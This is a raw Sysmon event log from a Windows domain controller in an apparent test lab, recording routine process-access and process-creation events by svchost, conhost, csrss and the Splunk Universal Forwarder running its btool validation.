15:51:17.175{D28789B6-7C74-5FA1-4700-000000008801}32442548C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{D28789B6-7C73-5FA1-3300-000000008801}2676C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001801Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:17.175{D28789B6-7C74-5FA1-4800-000000008801}24363900C:\Windows\system32\wbem\wmiprvse.exe{D28789B6-7C64-5FA1-1000-000000008801}1144C:\Windows\system32\svchost.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+64ebf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\combase.dll+a7962|C:\Windows\System32\combase.dll+a828e|C:\Windows\System32\combase.dll+a804f|C:\Windows\System32\combase.dll+46808|C:\Windows\System32\combase.dll+46420|C:\Windows\System32\combase.dll+54157|C:\Windows\System32\combase.dll+c1b04|C:\Windows\System32\combase.dll+521d1|C:\Windows\System32\combase.dll+52720|C:\Windows\System32\combase.dll+1fca|C:\Windows\System32\RPCRT4.dll+d97da|C:\Windows\System32\RPCRT4.dll+5fa39|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d 10341000x80000000000000002001Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:18.816{D28789B6-7C74-5FA1-3F00-000000008801}39563976C:\Windows\system32\conhost.exe{D28789B6-7C76-5FA1-5500-000000008801}3244C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002000Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:18.816{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001999Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:18.816{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001998Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:18.816{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001997Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:18.816{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001996Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:18.816{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001995Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:18.816{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001994Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:18.816{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001993Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:18.816{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001992Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:18.816{D28789B6-7C62-5FA1-0500-000000008801}644804C:\Windows\system32\csrss.exe{D28789B6-7C76-5FA1-5500-000000008801}3244C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001991Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:18.816{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001990Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:18.816{D28789B6-7C76-5FA1-5400-000000008801}35003628C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{D28789B6-7C76-5FA1-5500-000000008801}3244C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001989Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:18.819{D28789B6-7C76-5FA1-5500-000000008801}3244C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool validate-regex --log-warningsC:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{D28789B6-7C76-5FA1-5400-000000008801}3500C:\Program Files\SplunkUniversalForwarder\bin\btool.exe"C:\Program Files\SplunkUniversalForwarder\bin\btool" validate-regex --log-warnings 10341000x80000000000000001988Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:18.816{D28789B6-7C74-5FA1-3F00-000000008801}39563976C:\Windows\system32\conhost.exe{D28789B6-7C76-5FA1-5400-000000008801}3500C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001987Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:18.816{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001986Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:18.800{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001985Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:18.800{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001984Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:18.800{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001983Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:18.800{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001982Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:18.800{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001981Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:18.800{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001980Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:18.800{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001979Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:18.800{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001978Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:18.800{D28789B6-7C62-5FA1-0500-000000008801}644660C:\Windows\system32\csrss.exe{D28789B6-7C76-5FA1-5400-000000008801}3500C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001977Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:18.800{D28789B6-7C75-5FA1-4D00-000000008801}40324028C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{D28789B6-7C76-5FA1-5400-000000008801}3500C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4022c|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+403f8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+404c7|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+40fee|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+13671|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+181c6|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001976Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:18.814{D28789B6-7C76-5FA1-5400-000000008801}3500C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exe"C:\Program Files\SplunkUniversalForwarder\bin\btool" validate-regex 